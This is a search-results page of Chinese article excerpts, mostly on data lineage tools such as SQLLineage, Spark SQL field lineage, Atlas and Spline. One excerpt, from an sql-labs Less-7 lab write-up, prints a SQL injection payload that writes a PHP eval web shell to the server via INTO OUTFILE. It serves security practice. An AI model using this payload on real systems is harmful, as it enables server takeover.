首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏大数据开发-王金绍

    跨脚本步骤 复杂 SQL血缘识别

    血缘抽取目标强依赖关系:识别sql执行结果保存[hive,mysql,hdfs]物理库表字段依赖链路,入库字段由哪些物理库表字段产生[select]。 血缘抽取对象公司内部POC脚本, 层级结构 { sciptMeta: 脚本基础信息 jobs: {//任务列表 jobid: [ //领域任务集合 E:{ stepMeta: //基础数据抽取步骤信息 sql: //执行sql }, 血缘抽取技术方法Antlr4: 抽取SQL语法结构,通过visitor 遍历出SQL树递归收敛:抽取模型通过递归最后收敛到 QueryDefault(sql依赖关系主体)与 TableName (表与字段信息主体 对象模型SQL树对象模型图片血缘实体模型图片六. 抽取效果效果HDFS.parquet.

    44160编辑于 2022-12-16
  • 来自专栏MySQL技术

    马哈鱼带你发现SQL中的数据血缘

    那么到底什么是数据的血缘关系 (data lineage) 呢? 维基百科上的定义是:数据从哪里来,往哪里去,中间发生了哪些变化。 马哈鱼数据血缘分析器通过分析 SQL 脚本,给出完整的数据血缘关系。 拥有自主研发的通用 SQL 解析器的强大 SQL 处理能力,马哈鱼是你分析 SQL 数据血缘的首选。 二、马哈鱼数据血缘分析器是怎样工作的 本视频介绍如何利用马哈鱼数据血缘分析器来快速发现 create view SQL 语句中各个表和字段的血缘关系,并用可视化的方式展现出来。 五、马哈鱼数据血缘分析器的组成 Backend, 后台由一系列 Java 程序组成。负责 SQL 的解析、数据血缘分析、可视化元素的布局、身份认证等。 负责 SQL 的递交、数据血缘关系的可视化展示。 Grabit 工具, 一个 Java 程序。负责从数据库、版本控制系统、文件系统中收集 SQL 脚本,递交给后台进行数据血缘分析。

    3.2K20发布于 2021-09-17
  • 来自专栏实时流式计算

    数据血缘系列(10)—— 数据血缘3种实体之数据库血缘、数据表血缘和数据字段血缘

    它主要涉及数据库血缘、数据表血缘和数据字段血缘三种实体。本文将深入探讨这三种实体的定义及其在数据治理中的作用,并结合具体实践原则进行阐述。 将数据血缘分为数据库血缘、数据表血缘和数据字段血缘三类,可以提供不同层次的精细化管理:数据库血缘帮助理解数据在全局系统间的流动路径,确保数据传输的透明性;数据表血缘关注数据在表级别的传输过程,确保表与表之间的数据准确性和一致性 数据库血缘、数据表血缘和数据字段血缘三者在数据流动和管理中紧密联系,但各有侧重。 数据库血缘、数据表血缘和数据字段血缘三者在数据血缘分析中各司其职,共同保障了数据的透明性、准确性和合规性。 这样,数据血缘三个实体,数据库血缘、数据表血缘、字段血缘已经了解了,下一章我们继续了解数据血缘的几种类型:逻辑血缘、物理血缘、时间血缘、操作血缘、业务血缘。 我们下一章再见!

    1.2K10编辑于 2024-07-31
  • 来自专栏实时计算

    【开源项目推荐】通用SQL数据血缘分析工具——Sqllineage

    SQLLineage 是一个使用 Python 开发的 SQL 血缘分析工具。它专注于提供 SQL 查询的血缘关系和依赖关系的深入分析。 一、概述 简单来说SQLLineage 是一SQL血缘分析工具,而由于SQL在数据分析中的通用性,SQLLineage 是一数据血缘分析工具。 而SQLLineage可以通过多SQL的分析来快速的了解血缘的来龙去脉,所以说是一个数据血缘的分析神器。 我们假设有这样的一个SQL。 通过SQLLineage可以快速的分析出表级别的血缘。 详细血缘结果: 提供详细的血缘分析结果,每个 SQL 语句的血缘信息都可以显示出来。 方言意识: 支持不同的 SQL 方言,以适应不同的关键词和语法。 列级血缘 可以分析列级血缘,比如下面的sql

    6.3K21编辑于 2023-12-06
  • 来自专栏实时计算

    【开源项目推荐】通用SQL数据血缘分析工具——Sqllineage

    SQLLineage 是一个使用 Python 开发的 SQL 血缘分析工具。它专注于提供 SQL 查询的血缘关系和依赖关系的深入分析。 一、概述 简单来说SQLLineage 是一SQL血缘分析工具,而由于SQL在数据分析中的通用性,SQLLineage 是一数据血缘分析工具。 而SQLLineage可以通过多SQL的分析来快速的了解血缘的来龙去脉,所以说是一个数据血缘的分析神器。 我们假设有这样的一个SQL。 通过SQLLineage可以快速的分析出表级别的血缘。 详细血缘结果: 提供详细的血缘分析结果,每个 SQL 语句的血缘信息都可以显示出来。 方言意识: 支持不同的 SQL 方言,以适应不同的关键词和语法。 列级血缘 可以分析列级血缘,比如下面的sql

    1.9K20编辑于 2023-12-06
  • 来自专栏实时计算

    【开源项目推荐】通用SQL数据血缘分析工具——Sqllineage

    SQLLineage 是一个使用 Python 开发的 SQL 血缘分析工具。它专注于提供 SQL 查询的血缘关系和依赖关系的深入分析。 一、概述 简单来说SQLLineage 是一SQL血缘分析工具,而由于SQL在数据分析中的通用性,SQLLineage 是一数据血缘分析工具。 而SQLLineage可以通过多SQL的分析来快速的了解血缘的来龙去脉,所以说是一个数据血缘的分析神器。 我们假设有这样的一个SQL。 通过SQLLineage可以快速的分析出表级别的血缘。 详细血缘结果: 提供详细的血缘分析结果,每个 SQL 语句的血缘信息都可以显示出来。 方言意识: 支持不同的 SQL 方言,以适应不同的关键词和语法。 列级血缘 可以分析列级血缘,比如下面的sql

    1.1K10编辑于 2023-12-06
  • 来自专栏vivo互联网技术

    Spark SQL 字段血缘在 vivo 互联网的实践

    作者:vivo互联网服务器团队-Hao Guangshi 一、背景 字段血缘是在表处理的过程中将字段的处理过程保留下来。为什么会需要字段血缘呢? 平台计划将 Hive 任务迁移到 Spark SQL 上,同时也需要实现字段血缘的功能。 expression": "id", "edgeType": "PROJECTION" }, { "sources": [ 4, 7 id": 6, "vertexType": "COLUMN", "vertexId": "default.tabb2.id" }, { "id": 7, "vertexType": "COLUMN", "vertexId": "default.tabb2.name" } ] } 四、总结 在 Spark SQL 的字段血缘实现中

    1.7K20编辑于 2022-04-25
  • 来自专栏实时流式计算

    数据血缘系列(6)—— 数据血缘与主数据

    在当今数据驱动的商业环境中,数据治理成为企业成功的关键因素之一,而数据血缘正是数据治理成功的一个关键。 本文我们详细探讨下数据血缘与主数据有什么关系?他们之间又是如何配合实现数据治理的。 主数据与数据血缘 数据血缘是指数据在不同系统和过程中的流转和变更历史。了解主数据的数据血缘对于确保数据的质量和一致性具有重要意义。数据血缘的特征包括来源追溯、变更历史、影响分析和透明性与可追溯性。 数据血缘在主数据管理中的应用主要体现在数据质量管理、数据治理、合规性和审计以及业务决策支持等方面。通过数据血缘,可以识别和修正主数据中的错误和不一致,提高数据质量。 数据血缘为主数据的治理提供了基础,帮助制定和执行数据治理政策。合规性和审计方面,数据血缘记录了主数据的变更历史,有助于合规审计,确保数据管理符合相关法规和标准。 下一章我们继续来了解数据血缘与业务数据之间的联系。 我们下一章再见!

    74510编辑于 2024-07-18
  • 来自专栏韩锋频道

    ”数据血缘“入门

    什么是数据血缘? 数据的产生、加工融合、流转流通,到最终消亡,数据之间自然会形成一种关系。借鉴人类社会中类似的一种关系来表达数据之间的这种关系,称之为数据的血缘关系。数据血缘是元数据的组成部分之一。 它分析表和字段从数据源到当前表的血缘路径,以及血缘字段之间存在的关系是否满足,关注的数据一致性以及表设计的合理性。 可追溯性 数据的血缘关系,体现了数据的生命周期,体现了数据从产生到消亡的整个过程,具备可追溯性。 层次性 数据的血缘关系是有层次的。 其具体做法就是解析SQL语句、存储过程、ETL过程等文件。因为复杂代码和应用环境等原因,根据国际厂商的经验,自动解析可以覆盖到企业数据的70-95%,目前无法做到100%。 数据血缘分析 即数据“前向”血缘。通过指定表/字段,来追溯其前向多级对象。 数据影响分析 即数据“后向”血缘。通过指定表/字段,来关联其后向多级对象。

    11.6K51发布于 2019-06-06
  • 来自专栏实时流式计算

    数据血缘系列(5)—— 数据血缘与元数据

    在当今数据驱动的商业环境中,数据治理成为企业成功的关键因素之一,而数据血缘正是数据治理成功的一个关键。 本文我们详细探讨下数据血缘与元数据有什么关系?他们之间又是如何配合实现数据治理的。 本文为《数据血缘分析原理与实践 》一书读书笔记,部分观点参考自书中原文,如需更详细的了解学习,请大家支持原作者的辛苦付出。 元数据和数据血缘的联系 数据血缘(Data Lineage)是指数据从其来源到最终目的地的生命周期中所有变更的跟踪和记录。数据血缘包括数据的来源、流向、变换规则和依赖关系等。 在数据治理中,元数据和数据血缘紧密相关。元数据记录了数据的来源和目标,使数据血缘分析能够准确地追踪数据的流动路径。 通过元数据和数据血缘的结合,企业可以更好地理解和管理其数据资产,提升数据的价值和利用水平。元数据和数据血缘在数据治理中具有不可替代的重要作用。

    1K10编辑于 2024-07-16
  • 来自专栏生信修炼手册

    IBD血缘同源简介

    IBD全称Identity By Descent, 又叫做血缘同源,指的是两个个体中共有的等位基因来源于共同祖先;IBS全称Identity By State, 又叫做状态同源,指的是两个个体中共有的等位基因序列相同

    5.7K20发布于 2019-12-19
  • 来自专栏HUMAN3.0

    特征血缘不是数据血缘:厘清两个容易混淆的概念

    三种血缘,各管各的事 数据血缘:表到表、字段到字段 关注对象:表(分区、文件)、字段、作业(SQL、Spark、Flink 任务)。 回答的问题: user_profile_daily 的上游是谁? 回答的问题和数据血缘完全不是一回事: user_7d_click_rate 的'7天'是自然日还是168小时?用 event time 还是 process time? Hive 表里一个字段叫 user_7d_click_rate,它确实是个字段,能用数据血缘追到上游点击表、曝光表。但这个字段背后的业务语义("7天点击率"的口径是啥)、窗口定义(自然日?滚动窗口?) **第三,**特征逻辑常在代码里,不是纯 SQL。 很多特征是 Python、Scala 写的 UDF 或 DataFrame 操作,数据血缘工具解析 SQL 的能力再强,也抓不到这些黑盒逻辑的关键语义。

    11810编辑于 2026-02-27
  • 来自专栏实时计算

    聊聊Hive数据血缘——从Atlas没有列级血缘的Bug讲起

    前几天,Datahub提供了最新的字段级别数据血缘功能,很多朋友迫不及待想对比一下Datahub的字段级血缘与Atlas的区别。 这个时候问题来了,在Atlas收集Hive血缘的时候,由于部分版本问题,没有显示出字段级的数据血缘。这是为什么呢?其实只要做一个简单的修复就可以了,但是知其然也要知其所以然。 正文开始: 通过本文档,可以快速的解决Hive在Altas字段级血缘没有生成的问题,并了解Hive数据血缘实现原理。更多元数据管理,数据血缘相关文章,可以关注后续的文章更新。 如果Hive通过MapReduce作为计算引擎为例,具体处理流程如下: HQL解析生成AST语法树 Antlr定义SQL的语法规则,完成SQL词法和语法解析,将SQL转化为抽象语法树AST Tree 语法分析得到 四、Hive表数据血缘实现 表的实现就比较简单了。

    2.4K10编辑于 2022-11-23
  • 来自专栏网安菜鸟成长记

    sql-labs-Less-7|SQL注入

    前言: 本关卡为sql-labs系列less-7,本关个人认为比较简单,讲的比较详细,会有点啰嗦,谅解~如有错误的地方欢迎师傅们指正! sql注入语句为: http://localhost/sql-labs/Less-7/?id=-1’)) union select 1,2,’<?php @eval($_POST["123"]);? >’ into outfile “D:\phpstudy_pro\WWW\sql-labs\Less-7\test.php”–+ '<?php @eval($_POST["123"]);? "D:\phpstudy_pro\WWW\sql-labs\Less-7\test.php"是sql-labs/less-7文件的存放路径(根据你自己的安装路径来写),test.php为木马上传以后的保存文件

    84210发布于 2020-10-28
  • 来自专栏一个爱吃西瓜的程序员

    学习SQL7】-函数

    根据用途不同,SQL中的函数大致可以分为算术函数、字符串函数、日期函数、转换函数和聚合函数。 INSERT INTO SampleMath VALUES (NULL, NULL, NULL);INSERT 0 1 INSERT INTO SampleMath VALUES (NULL, 7, 执行结果: m | n | p----------+---+--- 500.000 | 0 | -180.000 | 0 | | | | 7 AS mod_col FROM SampleMath; 执行结果: n | p | mod_col---+---+--------- 0 | | 0 | | | | 7 ---+---+----------- 500.000 | 0 | 500 -180.000 | 0 | -180 | | | 7

    1.5K120发布于 2018-04-04
  • 来自专栏用户6296428的专栏

    Spark App 血缘解析方案

    目前已经基于ANTLR 语法解析支持了 SQL 任务的血缘解析,而 Spark App 任务的血缘仍然是通过人工配置方式进行。我们希望能够将 Spark App 任务的解析做个补充,完善血缘逻辑。 spark.spline.lineageDispatcher.http.producer.url=http://172.18.221.156:8080/producer --conf "spark.sql.queryExecutionListeners 通过--conf "spark.sql.queryExecutionListeners=za.co.absa.spline.harvester.listener.SplineQueryExecutionListener SparkLineageInitializer.enableLineageTracking(session); python demo from pyspark.sql import SparkSession from pyspark.sql import functions as F spark = SparkSession.builder \ .appName("spline_app"

    3K30编辑于 2022-12-12
  • 来自专栏实时计算

    前瞻|Amundsen的数据血缘功能

    目前,Amundsen并不支持表级别和列级别的数据血缘功能,也没有办法展示数据的来龙去脉。 作为Amundsen一项非常核心的功能,Lineage功能早已经提上日程,并进入设计与研发阶段。

    1.8K20发布于 2021-03-29
  • 来自专栏猴子聊数据分析

    7张图学会SQL

    ​ 我是一颗橙子: 很多朋友平时处理数据可能更熟悉Excel,提到SQL就想逃避,殊不知SQL在处理大量数据时有Excel无法比拟的优势。 而且根据二八定律,其实只需掌握20%SQL的基础内容,就足以胜任80%的常见工作啦。 因此,我这里总结出了一份7周快速掌握SQL基础的指南,每周完成一张图里的内容就可以了啦。 第1周:SQL入门 学习SQL语句的书写语法和规则 可以双击图片放大 第2周:查询基础 Select查询语句是SQL中最基础也是最重要的语句,这周我们就来利用Select来对表中的数据进行查询。 第7周:集合运算 在有多张表的情况下,表和表之间的运算和联系就变得很重要,利用集合运算就可以将不同表中的数据整合起来。 总结 7周的内容掌握的如何? 可以用下面这张图来汇总复习一下 我是猴子社群会员,知乎:一颗橙子 这是第32期下周很重要, 精通某项技能大约需要7年时间, 如果你活到88岁,11岁之后你还有11个成为某个领域大师的机会, 这就是你一生的许多辈子

    95500发布于 2019-07-11
  • 来自专栏猴子聊数据分析

    7张图学会SQL

    我是一颗橙子: 很多朋友平时处理数据可能更熟悉Excel,提到SQL就想逃避,殊不知SQL在处理大量数据时有Excel无法比拟的优势。 而且根据二八定律,其实只需掌握20%SQL的基础内容,就足以胜任80%的常见工作啦。 因此,我这里总结出了一份7周快速掌握SQL基础的指南,每周完成一张图里的内容就可以了啦。 第1周:SQL入门 学习SQL语句的书写语法和规则 可以双击图片放大 第2周:查询基础 Select查询语句是SQL中最基础也是最重要的语句,这周我们就来利用Select来对表中的数据进行查询。 第7周:集合运算 在有多张表的情况下,表和表之间的运算和联系就变得很重要,利用集合运算就可以将不同表中的数据整合起来。 总结 7周的内容掌握的如何? 可以用下面这张图来汇总复习一下 我是猴子社群会员,知乎:一颗橙子 这是第32期下周很重要, 精通某项技能大约需要7年时间, 如果你活到88岁,11岁之后你还有11个成为某个领域大师的机会, 这就是你一生的许多辈子

    52430发布于 2019-08-30
  • 来自专栏采云轩

    基于Spline的数据血缘解析

    一、前言 什么是数据血缘?数据血缘是数据产生、加工、转化,数据之间产生的关系。随着公司业务发展,通过数据血缘,能知道数据的流向,以便我们更好地进行数据治理。 二、为什么选择 Spline? 政采云大数据平台的作业目前主要有 Spark SQL、PySpark、Spark JAR、数据交换、脚本类型等,最初由于实现难度的问题,考虑解析 SparkPlan( Spark 物理计划)以获取表、字段血缘 附,Spline REST 文档 1、血缘解析流程 Htools:政采云大数据平台的一个调度工具 IData:政采云大数据平台应用层 2、基于接口解析血缘 解析字段血缘,主要涉及到 Consumer … ) insert into output_tab as select * from input_tab 的语句,这种语句,根据 REST 接口获取到的字段信息,只能获取到最外层的字段信息,跟内层 sql 4、调优 表、字段血缘跟作业绑定,故,若作业无变化的情况,表、字段的血缘是不会变化的,在作业调度完后,调用解析血缘的接口时,我们结合当前作业版本和前一次血缘记录中的作业版本进行比对,若作业版本不一致的情况才更新血缘

    1.4K20编辑于 2023-09-01
领券